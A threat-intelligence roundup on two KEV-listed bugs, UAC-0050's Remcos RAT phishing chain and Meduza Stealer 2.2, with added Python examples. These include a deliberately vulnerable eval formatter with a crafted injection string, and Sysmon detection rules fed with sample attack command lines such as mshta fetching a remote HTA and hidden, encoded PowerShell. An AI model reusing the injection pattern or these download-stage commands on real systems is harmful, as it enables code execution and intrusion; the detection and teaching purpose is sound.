
CTI Roundup: Remcos RAT Phishing Attacks, New Meduza Stealer Found on Dark Web

CISA adds two bugs to the KEV catalog, UAC-0050 distributes Remcos RAT with phishing tactics, and an updated version of Meduza Stealer launches on the dark web

Emerging Issue

In this week’s roundup, CTI investigates the two latest bugs in the U.S. Cybersecurity and Infrastructure Security Agency’s Known Exploited Vulnerabilities catalog. Next up, CTI gives an overview of the threat actor UAC-0050 which is now distributing Remcos RAT using phishing tactics. Finally, CTI looks at the latest version of the Meduza password stealer which is now circulating on the dark web.

1. CISA adds two bugs to the Known Exploited Vulnerabilities (KEV) catalog

CISA’s recent additions to the Known Exploited Vulnerabilities (KEV) catalog include a patched flaw in Google Chrome and a bug that affects Spreadsheet::ParseExcel, which is an open-source Perl library.

The agency has set a due date of January 23, 2024 for federal agencies to mitigate the two issues or cease using the vulnerable products.

Bug I: CVE-2023-7024

The first bug is CVE-2023-7024, which is a heap buffer overflow in WebRTC for Google Chrome prior to 120.0.6099.129. This vulnerability could enable a remote attacker to exploit heap corruption via a crafted HTML page. It has a high base score of 8.8 in the National Vulnerability Database.

  • Google’s Threat Analysis Group first reported the vulnerability on December 19, 2023. According to their researchers, the vulnerability was exploited in the wild before patches were made available.
  • Google has since released a security update that fixes a potential heap buffer overflow in WebRTC. Patched versions were rolled out to Windows users (120.0.6099.129/130) and Mac and Linux users (120.0.6099.129) one day after being reported to Google.
  • This vulnerability marked the eighth zero-day vulnerability for Chromium-based web browsers in 2023. Google has not yet provided details about any specific attacks that exploited the vulnerability, noting that bug details may be restricted until more users are patched against the flaw.

Bug II: CVE-2023-7101

The second vulnerability, CVE-2023-7101, is found in Spreadsheet::ParseExcel version 0.65 (fixed in 0.66), a Perl module for parsing Excel files.

  • Spreadsheet::ParseExcel was found to contain an arbitrary code execution vulnerability: it passed unvalidated input from a file into a string-type "eval," so Perl compiled and ran attacker-controlled text as code. The issue stemmed from the evaluation of Number format strings (not printf-style format strings) within the Excel parsing logic.
  • At the time of writing this bug was still awaiting NVD analysis and had no CVSS score.
  • Barracuda disclosed a slightly different vulnerability on December 24, 2023, tracked as CVE-2023-7102. This zero-day was due to a weakness in the Spreadsheet::ParseExcel third-party library used by the Amavis virus scanner running on Barracuda ESG appliances.
  • This flaw could be exploited to execute arbitrary code on unpatched ESG appliances via parameter injection. The company then filed CVE-2023-7101 to track the bug separately in the open-source library.
  • Barracuda has attributed the exploitation of CVE-2023-7102 to UNC4841, which has previously been linked to exploitation of other Barracuda zero-days. The actor followed exploitation activity with the deployment of new variants of known implants called SEASPY and SALTWATER – both of which are equipped for persistence and command execution.
  • Mandiant has been investigating activity related to the exploitation of these Spreadsheet::ParseExcel vulnerabilities, noting that public and private organizations located across 16 countries are estimated to have been impacted since October 2022.
  • Google Cloud has noted that it observed exploitation of CVE-2023-7102 targeting high-tech, information technology providers, and government entities primarily in the U.S. and Asia-Pacific regions no earlier than November 30, 2023.
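The pattern behind CVE-2023-7101 is worth seeing side by side with its fix. The block below is an added example written in Python rather than Perl and is not code from Spreadsheet::ParseExcel: it reproduces the bug class (CWE-95, building source text from a number-format string read out of the file and evaluating it) beside the hardened form that validates the string and passes it to the formatting API as data. Function names, the whitelist regex and the sample format strings are illustrative; the "malicious" format only appends to a list so the injection is provable without shelling out.

```python
"""Eval-injection analog of CVE-2023-7101 (CWE-95).

Added example, not the Perl library's code: a format string that came out
of the workbook is spliced into source text and eval'd, versus calling the
formatting API directly after validation.
"""
import re

INJECTED = []   # side channel so the demo can prove injected code ran


def format_cell_unsafe(value, fmt):
    """Vulnerable pattern: the format string becomes part of the program.
    Whatever sits in the workbook's format record is executed as code."""
    code = f"format(value, '{fmt}')"
    return eval(code, {"value": value, "INJECTED": INJECTED})


# Whitelist for Python's format-spec mini-language (Excel formats are richer,
# but the principle is identical: validate, then call the API, never eval).
SAFE_SPEC = re.compile(r"[<>=^]?[+\- ]?#?0?[0-9]*[,_]?(?:\.[0-9]+)?[bcdeEfFgGnosxX%]?")


def format_cell_safe(value, fmt):
    """Hardened form: reject anything outside the whitelist, then pass the
    spec to format() as data. No code is ever built from file contents."""
    if not SAFE_SPEC.fullmatch(fmt):
        raise ValueError(f"rejected number format: {fmt!r}")
    return format(value, fmt)


# Constructed "format records" as they might be read from a workbook.
BENIGN_FMT = ".2f"
# Closes the quoted spec, runs attacker code, then re-opens a quote so the
# spliced source still parses. A real payload would use __import__('os').
MALICIOUS_FMT = "') and INJECTED.append('ran') or ('"


def demo():
    """Run both implementations over both format strings; return a summary."""
    results = {}
    results["unsafe_benign"] = format_cell_unsafe(3.14159, BENIGN_FMT)
    results["unsafe_malicious"] = format_cell_unsafe(3.14159, MALICIOUS_FMT)
    results["injected"] = list(INJECTED)          # non-empty: code from the file ran
    results["safe_benign"] = format_cell_safe(3.14159, BENIGN_FMT)
    try:
        format_cell_safe(3.14159, MALICIOUS_FMT)
        results["safe_malicious"] = "accepted"
    except ValueError:
        results["safe_malicious"] = "rejected"
    return results


if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{k}: {v!r}")
```

The unsafe path still "works" for the benign format, which is exactly why this class of bug survives in parsers for years: nothing breaks until a file arrives whose format record is crafted to close the quote. For the Barracuda case the untrusted file was an inbound e-mail attachment scanned by Amavis, so the eval ran with the scanner's privileges and no user interaction.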

Analyst comments from Tanium’s Cyber Threat Intelligence team

While CISA’s announcement is important and valuable, it’s important to understand that we should not necessarily wait for vulnerabilities to be added to the KEV to determine if we should patch or not.

As the KEV’s name indicates, these vulnerabilities are known to have been exploited in the wild. If you wait, it may already be too late. Just because a vulnerability is not on CISA’s list does not mean it is not being exploited.

Even with that said, patching these newly added vulnerabilities is something that certainly should be done, if not already.
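One practical way to act on both points above, prioritizing catalog entries by due date while still surfacing findings the catalog does not cover, is to join scanner output against the KEV feed. The block below is an added example and not Tanium tooling; the catalog excerpt is constructed to mirror the field names of CISA's known_exploited_vulnerabilities.json, the host names are invented, and CVE-2023-0000 is a placeholder for a finding that is not in the catalog.

```python
"""Triage scanner findings against the CISA KEV feed.

Added example. KEV_JSON is a constructed excerpt using the feed's published
field names; FINDINGS is invented scanner output (CVE -> affected hosts).
"""
import json
from datetime import date

KEV_JSON = json.dumps({
    "title": "CISA Catalog of Known Exploited Vulnerabilities",
    "vulnerabilities": [
        {
            "cveID": "CVE-2023-7024",
            "vendorProject": "Google",
            "product": "Chromium WebRTC",
            "dateAdded": "2024-01-02",
            "requiredAction": "Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.",
            "dueDate": "2024-01-23",
            "knownRansomwareCampaignUse": "Unknown",
        },
        {
            "cveID": "CVE-2023-7101",
            "vendorProject": "Spreadsheet::ParseExcel",
            "product": "Spreadsheet::ParseExcel",
            "dateAdded": "2024-01-02",
            "requiredAction": "Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.",
            "dueDate": "2024-01-23",
            "knownRansomwareCampaignUse": "Unknown",
        },
    ],
})

FINDINGS = {
    "CVE-2023-7024": ["ws-0412", "ws-0777"],
    "CVE-2023-7101": ["mailgw-01"],
    "CVE-2023-0000": ["build-03"],   # placeholder ID, not in the catalog
}


def load_kev(kev_text):
    """Index the catalog by CVE ID."""
    data = json.loads(kev_text)
    return {v["cveID"]: v for v in data["vulnerabilities"]}


def triage(kev_text, findings, today):
    """Return (in_kev, not_in_kev).

    in_kev rows are sorted by days_left (negative means the CISA due date has
    passed); not_in_kev rows are findings the catalog says nothing about and
    must still be assessed on their own merits.
    """
    if isinstance(today, str):
        today = date.fromisoformat(today)
    kev = load_kev(kev_text)
    in_kev, not_in_kev = [], []
    for cve, hosts in findings.items():
        entry = kev.get(cve)
        if entry is None:
            not_in_kev.append({"cve": cve, "hosts": hosts})
            continue
        due = date.fromisoformat(entry["dueDate"])
        in_kev.append({
            "cve": cve,
            "hosts": hosts,
            "product": entry["product"],
            "due": entry["dueDate"],
            "days_left": (due - today).days,
            "ransomware": entry.get("knownRansomwareCampaignUse", "Unknown"),
        })
    in_kev.sort(key=lambda r: (r["days_left"], r["cve"]))
    return in_kev, not_in_kev


if __name__ == "__main__":
    hits, misses = triage(KEV_JSON, FINDINGS, "2024-01-10")
    for r in hits:
        print(f'{r["cve"]} {r["product"]} due {r["due"]} ({r["days_left"]} days) hosts={r["hosts"]}')
    for r in misses:
        print(f'{r["cve"]} not in KEV; assess separately, hosts={r["hosts"]}')
```

In production the catalog text would come from a scheduled download of the live feed rather than an embedded string; the join logic is unchanged.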

2. UAC-0050 distributes Remcos RAT with new phishing tactics

A threat actor tracked as UAC-0050 is actively deploying phishing attacks to distribute Remcos RAT. The actor has shifted to new strategies to evade detection, including the integration of a pipe method for inter-process communication to create a covert channel for data transfer.

Background on UAC-0050

Uptycs received an alert for a suspicious LNK file on December 21, 2023, that led them to a deeper investigation. Their analysis revealed that UAC-0050 was deploying Remcos RAT in a targeted operation against Ukrainian government entities.

The initial access is believed to be phishing or spam emails masked as job propositions, targeting Ukrainian military personnel. The LNK file initiates the download of an HTA file which includes a VBS script. This script triggers a PowerShell script that, in turn, downloads a malicious payload. Execution of the payload ultimately launches explorer.exe and places Remcos RAT in that process’s memory.

Technical details

As noted, the attack chain begins with an LNK file. The LNK in this attack gathers information about which antivirus software is installed on the targeted device. It also contains an obfuscated URL string that is handed to MSHTA (mshta.exe) for execution.

Uptycs was able to obtain the “6.hta” file for additional analysis, leading to the discovery of the contained VBS script. The PowerShell script that is executed via the VBS script has several tasks like initializing a string, creating decryption objects, creating memory streams, and more.

Deobfuscating that script revealed another PowerShell script that created file paths in the AppData directory, verified the existence of specific files, and invoked a function named DcO to carry out various actions.

Uptycs was able to gather all of the PowerShell activities that seemed malicious and ultimately discovered that the payloads (word_update.exe and ofer.docx) were downloaded from the domain new-tech-savvy[.]com.

Payload information

By running the payload “word_update.exe,” researchers found that it will make a copy of itself in a newly created folder, changing the name of the file.

The malware then establishes persistence by creating an LNK file in the Startup folder, so the renamed copy is executed each time the user logs on. The binary carried unusual resource data that was loaded into memory and decrypted.

The malware then invoked the WriteFile API and used pipes to evade security solutions: the process writes through a handle to an unnamed pipe and, once the write completes, the data is passed from word_update.exe to cmd.exe. The data was decrypted in memory at runtime before Remcos RAT was executed.
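Each stage of the chain above leaves a process or file event that is unusual on its own and unmistakable in sequence: explorer.exe spawning mshta.exe with a URL, a script host spawning PowerShell, a binary under AppData writing a .lnk into the Startup folder, and that same binary spawning cmd.exe. The block below is an added example of detection logic for those four stages, not Uptycs’ or Tanium’s detection content. It runs over constructed Sysmon-style records that mimic the fields of Event ID 1 (process create) and Event ID 11 (file create); the user name, file names, URL and the renamed copy of word_update.exe are placeholders.

```python
"""Stage-by-stage detections for the UAC-0050 Remcos chain, run over
constructed Sysmon-style events.

Added example, not vendor detection content. SAMPLE_EVENTS is invented and
only mirrors the Sysmon Event ID 1 / Event ID 11 field names.
"""
import re


def _base(path):
    """Lower-cased file name component of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


# One rule per stage. Each returns a reason string on match, else None.
def r_lnk_to_mshta(e):
    """LNK double-click: explorer.exe spawns mshta.exe with a URL or .hta."""
    if (e["EventID"] == 1 and _base(e["Image"]) == "mshta.exe"
            and _base(e["ParentImage"]) == "explorer.exe"
            and re.search(r"https?://|\.hta\b", e["CommandLine"], re.I)):
        return "mshta.exe launched from explorer with remote HTA"


def r_script_host_to_powershell(e):
    """HTA/VBS stage handing off to PowerShell."""
    if (e["EventID"] == 1 and _base(e["Image"]) in {"powershell.exe", "pwsh.exe"}
            and _base(e["ParentImage"]) in {"mshta.exe", "wscript.exe", "cscript.exe"}):
        return "PowerShell spawned by script host"


def r_startup_lnk(e):
    """Persistence: a binary in a user-writable path drops a .lnk into Startup."""
    if (e["EventID"] == 11
            and re.search(r"\\start menu\\programs\\startup\\[^\\]+\.lnk$",
                          e["TargetFilename"], re.I)
            and re.search(r"\\(appdata|temp|programdata)\\", e["Image"], re.I)):
        return "Startup-folder LNK written by binary in user-writable path"


def r_appdata_binary_spawns_cmd(e):
    """Pipe hand-off: the AppData-resident dropper spawning cmd.exe."""
    if (e["EventID"] == 1 and _base(e["Image"]) == "cmd.exe"
            and re.search(r"\\appdata\\", e["ParentImage"], re.I)):
        return "cmd.exe spawned by binary in AppData"


RULES = [r_lnk_to_mshta, r_script_host_to_powershell,
         r_startup_lnk, r_appdata_binary_spawns_cmd]


def detect(events):
    """Return [(rule_name, reason, image)] for every rule/event match, in order."""
    hits = []
    for e in events:
        for rule in RULES:
            reason = rule(e)
            if reason:
                hits.append((rule.__name__, reason, e["Image"]))
    return hits


# Constructed telemetry (placeholder user, paths and URL).
USER = r"C:\Users\analyst"
DROPPER = USER + r"\AppData\Roaming\WordSvc\wordsvc.exe"   # renamed copy of word_update.exe
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "mshta.exe http://example.invalid/6.hta"},
    {"EventID": 1, "Image": PS, "ParentImage": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "powershell.exe -w hidden -nop -enc <base64>"},
    {"EventID": 1, "Image": USER + r"\AppData\Local\Temp\word_update.exe",
     "ParentImage": PS, "CommandLine": "word_update.exe"},
    {"EventID": 11, "Image": DROPPER,
     "TargetFilename": USER + r"\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\wordsvc.lnk"},
    {"EventID": 1, "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": DROPPER, "CommandLine": "cmd.exe"},
    # Benign noise that must not fire: normal explorer child, installer writing Startup.
    {"EventID": 1, "Image": r"C:\Windows\System32\notepad.exe",
     "ParentImage": r"C:\Windows\explorer.exe", "CommandLine": "notepad.exe notes.txt"},
    {"EventID": 11, "Image": r"C:\Program Files\Vendor\setup.exe",
     "TargetFilename": USER + r"\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Vendor.lnk"},
]


if __name__ == "__main__":
    for name, reason, image in detect(SAMPLE_EVENTS):
        print(f"[{name}] {reason}: {image}")
```

The last rule is the one that catches the pipe technique indirectly: the pipe itself is invisible to process telemetry, but the cmd.exe child of a binary living under AppData is not, and that parent/child pair is the reliable artifact. Correlating all four rules on the same host within a few minutes turns individually noisy signals into a high-confidence alert.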

Analyst comments from Tanium’s Cyber Threat Intelligence team

Using a pipe method to establish a covert channel to transfer data is not an entirely new technique, but it does appear to be new to this threat actor — indicating a shift in the actor’s TTPs and potentially signaling a growing level of sophistication.

What’s interesting is the use of Remcos RAT. The threat actor seems to be increasingly delivering this RAT and was even called out in a warning from CERT-UA last year. While the attack seems to be rather targeted right now, it does make use of TTPs that are commonly used, and therefore is still worth keeping an eye on.

3. New Meduza Stealer version appears on the dark web

Resecurity recently spotted the author of the Meduza password stealer releasing a new version, 2.2, on the dark web. The release was announced on the dark web on December 24, 2023.

The latest version comes just a few months after the stealer’s initial release in June 2023 and is already generating significant interest. The biggest improvements in version 2.2 are support for additional software clients, an upgraded credit card grabber, and new mechanisms for dumping password stores on different platforms to extract credentials and tokens.

What is Meduza Stealer?

Meduza originally emerged on the XSS underground forum. It later received positive feedback on other communities, like Exploit.

The stealer currently supports Windows Server 2012, 2016, 2019, 2022 and Windows 10/11. Meduza is capable of stealing data from a wide range of software and applications including over 100 browsers, more than 100 cryptocurrency wallets, Telegram IM, Steam, Discord, 27 password managers, Outlook, Google Tokens, and more.

The latest Meduza Stealer updates

The Meduza author is implementing several upgrades for 2024. One key upgrade is the optimization and rewriting of the password grabber from STL to WinAPI. With this comes multiple improvements to the stealer’s C2 communications.

2024 will also bring an improved crypting stub and AV evasion; for an extra fee, the author offers enhanced obfuscation of the stealer with better coverage against anti-virus detection. Meduza now also supports new browser-based cryptocurrency wallets.

The author behind Meduza has partnered with a reputable underground crypting service known as TrueCrypt Service. Numerous malware and ransomware operators use this service to obfuscate payloads and evade anti-virus solutions. Resecurity found that the latest result of crypting worked to some degree, with detection by only one vendor on VirusTotal at time of discovery.

How much does Meduza Stealer cost?

Meduza Stealer 2.2 is priced at $199 per month, with a lifetime membership being $1199.

The team also offers crypting services with public and private stub and offers servers to host C2 panels — for a price. Once a threat actor makes a payment for Meduza, the author will invite the actor into a private Telegram channel where they will receive the new tool. According to Resecurity, the latest version available on the private Telegram channel is Meduza 2.2.7, indicating further improvements to the malware.

To install Meduza the threat actor must first launch the shared MedusaServer.exe file, install Python version 3.10.2, install Microsoft Visual Studio Redistributable, and execute several commands in the console. The latest Meduza variant supports communication via Telegram IM as a way of delivering logs from the infected victim.

Analyst comments from Tanium’s Cyber Threat Intelligence team

Meduza’s author is working hard to continually improve the malware and make it more attractive to threat actors. Version 2.2 was published on December 24, and there is now already version 2.2.7 available. This demonstrates how quickly the stealer is evolving.

Given the continued support and growth of Meduza, Resecurity believes that Meduza is beginning to compete with Azorult and Redline Stealer. Only time will tell just how successful the Meduza Stealer will become.


Tanium CTI

Tanium's Cyber Threat Intelligence (CTI) analysts process and extract trends from the daily cyber landscape to curate and deliver current intel to stakeholders around threats impacting business and security.
